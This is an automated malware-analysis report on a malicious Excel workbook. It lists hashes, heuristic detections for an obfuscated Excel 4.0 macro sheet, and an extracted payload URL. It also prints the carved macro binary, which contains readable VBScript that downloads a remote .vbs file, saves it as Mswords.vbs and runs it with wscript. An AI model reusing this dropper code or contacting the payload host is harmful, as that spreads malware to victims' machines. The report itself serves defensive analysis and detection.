Office (OOXML) / .XLSX malware analysis — malicious · d1e19a6c116e4b01

MALICIOUS

Office (OOXML) / .XLSX

429.9 KB Created: 2025-07-15 05:45:39 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2026-05-13

MD5: 22f95e27ba803a6212e0bd27ff6e9c44 SHA-1: d256251aefd81bacc226021d0ead0ce15fba9391 SHA-256: d1e19a6c116e4b01fb9042a7b2806e88a25e132aa58b2998c4191d1cb680e2ed

182 Risk Score

Heuristics 4

Excel 4.0 macro sheet (1 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
XLM payload reassembled from CHAR()/split formulas critical OOXML_XLM_REASSEMBLED_PAYLOAD

An Excel 4.0 macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and string fragments, so no WinAPI name, shell command, or URL is ever contiguous in the .bin for a literal-bytes scan to find. Reassembling the formulas recovered download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell), or a payload URL — the de-obfuscated download-and-run kill chain.
URL reconstructed from XLM cell array (1 URL) critical OOXML_XLM_CELL_ARRAY_URL

Excel 4.0 macro sheet stages its payload URL across individual numeric cells (one ASCII charcode per cell), inside an embedded HTA that uses VBScript Chr()/&-concat obfuscation, or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF12 record stream of every worksheet and macrosheet part and decoding RK/inline-string/shared-string cells in row-major and column-major order plus FORMULA cell-reference concatenation in token order.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://astaoffices.com/mx/mx.vbs Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_sheet_00.bin xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.bin 3303 bytes

Filename	Kind	Source	Size
`xlm_sheet_00.bin`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet1.bin	3303 bytes
SHA-256: `d2aa6a28c23bb3ba1be77eb80f9b7ffdb99a85c2ec3c6509fc01333020d6240f`
Preview script First 1,000 lines of the extracted script � � � @ �� @ d � $ � � % �� & � �� < � � � % �� & � � � S� @ k f u C : \ U s e r s \ P u b l i c \ B X % �� & � � � H� 5 f i l C g x k p 9 6 . v b s B � B X % �� & � � � F� 3 C O n E r r o r R e s u m e N e x t A� % �� & � � � @� - C c 3 r 9 i a = " m i c r O s " A� % �� & � � � :� ' C w p 5 j a j = " a D o " A� % �� & � � � @� - C o n r e 5 r = " d b . s T r " A� % �� & � � � H� 5 C d n e h b m = " o f t . x m l h " A� % �� & � � � @� - C r 2 j p s 7 = " D� �� " A� % �� & � � � � � � C > d i m w r b 4 y z : S e t w r b 4 y z = c r e a t e o b j e c t ( w p 5 j a j & o n r e 5 r & " e a m " ) A� � % �� & � � � � � � C > d i m n g k k c k : S e t n g k k c k = c r e a t e o b j e c t ( c 3 r 9 i a & d n e h b m & " T T P " ) A� % �� & � � � ^� K C n g k k c k . O p e n " G E T " , r 2 j p s 7 , F a l s e A� % �� & � � � 4� ! C n g k k c k . S e n d A� % �� & � � � 4� ! C w i t h w r b 4 y z A� % �� & � � � 8� % C . t y p e = 1 A� % �� & � � � 0� C . o p e n A� % �� & � � � Z� G C . w r i t e n g k k c k . r e s p o n s e B o d y A� % �� & � � � l� Y C . s a v e t o f i l e " C M s w o r d s . v b s " , 2 A� % �� & � � � .� C e n d w i t h A� % �� & � � � � � � C G e t O 3 b j e c t ( " n e w : 1 3 7 0 9 6 2 0 - C 2 7 9 - 1 1 C E - A 4 9 E - 4 4 4 5 5 3 5 4 0 0 0 0 " ) . O p e n ( " C M s w o r d s . v b s " ) A� % �� & � � � 0� C E r r . C l e a r A� % �� & � � � � C A� % �� & � � � P� = w s c r i p t C g x k p 9 6 . v b s B n % �� & � � � � B 6 � � � �� @ ��w�� HX�ԁ* �) �s��ZT(�.�"�wYT�[�G\��eUh��_�߁38� ��bPш � �դMGkd��C�+ S H A - 5 1 2 � B � � 0ffffff�?ffffff�? �? �?333333�?333333�?�

SHA-256: d2aa6a28c23bb3ba1be77eb80f9b7ffdb99a85c2ec3c6509fc01333020d6240f

Preview script

First 1,000 lines of the extracted script

�  �  �   @      ��������    �  �   �   �   �   �  �  �         �   @   d           � $                                    �  �  %      ��    & �  ����        �  <     �             �  �  %      ��    &   �                �   �   
S�          @          k f u    C :    \ U s e     r s \ P u b     l i c \  B X     %      ��    &   �                �   �   
H�          5          f i l C     
 g x k p 9 6 . v b s     B � B X     %      ��    &   �                �   �    F�          3   C       O n   E r r o r   R e s u m e   N e x t A�     %      ��    &   �                �   �    @�          -   C       c 3 r 9 i a   =   " m i c r O s " A�     %      ��    &   �                �   �    :�          '   C       w p 5 j a j   =   " a D o " A�     %      ��    &   �                �   �    @�          -   C       o n r e 5 r   =   " d b . s T r " A�     %      ��    &   �                �   �    H�          5   C       d n e h b m   =   " o f t . x    m l h "  A�     %      ��    &   �                �   �    @�          -   C     
 r 2 j p s 7   =   " D�   ��    "  A�     %      ��    &   �                �   �    � �          �   C     > d i m   w r b 4 y z :   S e t   w r b 4 y z   =   c r e a t e o b j e c t ( w p 5 j a j   &   o n r e 5 r   &   " e a m " ) A�       �           %      ��    &   �                �   �    � �          �   C     > d i m   n g k k c k :   S e t   n g k k c k   =   c r e a t e o b j e c t ( c 3 r 9 i a   &   d n e h b m   &   " T T P " ) A�     %      ��    &   �                �   �    ^�          K   C       n g k k c k . O p e n   " G E T " ,   r 2 j p s 7 ,   F a l s e A�     %      ��    &   �                �   �    4�          !   C       n g k k c k . S e n d A�     %      ��    &   �                �   �    4�          !   C       w i t h   w r b 4 y z A�     %      ��    &   �                �   �    8�          %   C     
         . t y p e   =   1 A�     %      ��    &   �                �   �    0�              C     	         . o p e n A�     %      ��    &   �                �   �    Z�          G   C               . w r i t e   n g k k c k . r e s p o n s e B o d y A�     %      ��    &   �                �   �    l�          Y   C     
         . s a v e t o f i    l e   "  C        M s w o r d s . v b s " ,   2  A�     %      ��    &   �                �   �    .�              C       e n d   w i t h A�     %      ��    &   �                �   �    � �          �   C       G e t O  3 b j e c t ( " n e w : 1 3 7 0 9 6 2 0 - C 2 7 9 - 1 1 C E - A 4 9 E - 4 4 4 5 5 3 5 4 0 0 0 0 " ) . O     p     e n ( "  C      
 M s w o r d s . v b s " )  A�     %      ��    &   �                �   �    0�              C     	 E r r . C l e a r A�     %      ��    &   �                �   �     �              C    A�     %      ��    &   �                �   �    P�          =      w s    c r i p t    C        g x k p 9 6 . v     b s  B n     %      ��    &   �                �   �   
 �              B 6     �  � � ��                                                                  @   ���w�� �HX�ԁ* �)
�s����ZT(�.�"�wYT�[�G\�����eUh��_�߁38� ��bPш    � 	�դMGkd��C�+    S H A - 5 1 2 � B                                                                  �    � 0ffffff�?ffffff�?      �?      �?333333�?333333�?�

Open this report in the interactive analyzer, or submit your own file for analysis.